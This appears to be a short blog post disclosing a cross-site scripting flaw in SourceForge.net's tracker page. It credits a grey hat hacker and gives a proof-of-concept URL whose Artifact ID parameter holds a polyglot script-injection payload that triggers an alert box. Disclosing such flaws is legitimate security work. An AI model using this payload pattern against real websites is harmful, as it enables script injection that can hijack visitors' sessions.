SourceForge.net vulnerable to Cross site scripting(XSS)

Grey hat hacker called as "Sony" has discovered Cross site scripting vulnerability in SourceForge.net website. SourceForge is one of best website that hosts best open source projects such as 7zip, ophcrack and our HashcodeCracker project.

The Artifact ID field in the Feature Requests tracker page vulnerable to XSS attack. Hacker said this is not critical bug.

Poc:
http://sourceforge.net/tracker/?limit=25&func=&group_id=551517&atid=2238316&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=\\\';alert(String.fromCharCode(88,83,83))//\\\\\\\';alert(String.fromCharCode(88,83,83))//\\&assignee=&status=&category=&artgroup=&submitter=&keyword=&artifact_id=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&submit=Filter

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

SourceForge.net vulnerable to Cross site scripting(XSS)

Footer About

Search This Blog

Sections

Popular Posts

Blog Archive

Labels

Report Abuse

About Me

Showing result(s) for

Popular Posts

Pages

Menu Item

Next

Newer Post

Previous

Older Post

Vulnerability

Web Application Vulnerability

XSS Vulnerability